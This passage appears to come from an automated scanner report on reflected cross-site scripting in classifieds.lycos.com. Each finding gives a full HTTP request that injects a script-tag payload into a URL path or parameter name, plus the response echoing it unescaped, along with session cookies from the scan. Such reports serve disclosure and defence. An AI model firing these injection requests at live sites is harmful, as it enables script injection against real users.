GET /job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:49:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:49:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17685
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-retail5f5b3"><script>alert(1)</script>ea30b774ac5/?mobile=1" rel="nofollow"> ...[SNIP]...
1.80. http://classifieds.lycos.com/job-retail/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-retail/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eed2"><script>alert(1)</script>2905db3b6fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 55772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-retail/?4eed2"><script>alert(1)</script>2905db3b6fd=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96fa6"><script>alert(1)</script>def49ff2313 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-sales96fa6"><script>alert(1)</script>def49ff2313/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:11:58 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:58 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-sales96fa6"><script>alert(1)</script>def49ff2313/?mobile=1" rel="nofollow"> ...[SNIP]...
1.82. http://classifieds.lycos.com/job-sales/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-sales/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c70"><script>alert(1)</script>3428ab5ad3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57509
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-sales/?17c70"><script>alert(1)</script>3428ab5ad3b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5865d"><script>alert(1)</script>782edef86df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-tech5865d"><script>alert(1)</script>782edef86df/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:14 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-tech5865d"><script>alert(1)</script>782edef86df/?mobile=1" rel="nofollow"> ...[SNIP]...
1.84. http://classifieds.lycos.com/job-tech/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-tech/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f9c"><script>alert(1)</script>4fb2b134996 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 52469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-tech/?80f9c"><script>alert(1)</script>4fb2b134996=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80a84"><script>alert(1)</script>b01d18e6368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-work_from_home80a84"><script>alert(1)</script>b01d18e6368/?mobile=1" rel="nofollow"> ...[SNIP]...
1.86. http://classifieds.lycos.com/job-work_from_home/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job-work_from_home/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57054"><script>alert(1)</script>094863826eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49322
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job-work_from_home/?57054"><script>alert(1)</script>094863826eb=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f385"><script>alert(1)</script>76fb73576c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job2f385"><script>alert(1)</script>76fb73576c2/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:18 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job2f385"><script>alert(1)</script>76fb73576c2/?mobile=1" rel="nofollow"> ...[SNIP]...
1.88. http://classifieds.lycos.com/job/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/job/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d8b7"><script>alert(1)</script>809a2f23ff8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:32 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/job/?7d8b7"><script>alert(1)</script>809a2f23ff8=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9028c"><script>alert(1)</script>6a01bc38598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /personals9028c"><script>alert(1)</script>6a01bc38598/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:50 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:50 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/personals9028c"><script>alert(1)</script>6a01bc38598/?mobile=1" rel="nofollow"> ...[SNIP]...
1.90. http://classifieds.lycos.com/personals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/personals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b0"><script>alert(1)</script>aa27322bcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:43 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 81210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/personals/?f66b0"><script>alert(1)</script>aa27322bcf1=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 731a1"><script>alert(1)</script>759aa8706ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post731a1"><script>alert(1)</script>759aa8706ec/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:58:05 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:05 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/post731a1"><script>alert(1)</script>759aa8706ec/?mobile=1" rel="nofollow"> ...[SNIP]...
1.92. http://classifieds.lycos.com/post/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/post/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ff76"><script>alert(1)</script>65823c63197 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /post/?3ff76"><script>alert(1)</script>65823c63197=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:57:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:57:55 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 9528
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/post/?3ff76"><script>alert(1)</script>65823c63197=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2ac9"><script>alert(1)</script>c8f3dc213dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:08:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:08:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-clothesf2ac9"><script>alert(1)</script>c8f3dc213dd/?mobile=1" rel="nofollow"> ...[SNIP]...
1.94. http://classifieds.lycos.com/sale-clothes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-clothes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d400c"><script>alert(1)</script>84050bf8d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:07:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:26 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43009
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-clothes/?d400c"><script>alert(1)</script>84050bf8d91=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e51"><script>alert(1)</script>ece04b856b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-collectiblec9e51"><script>alert(1)</script>ece04b856b8/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:07:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:07:23 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17703
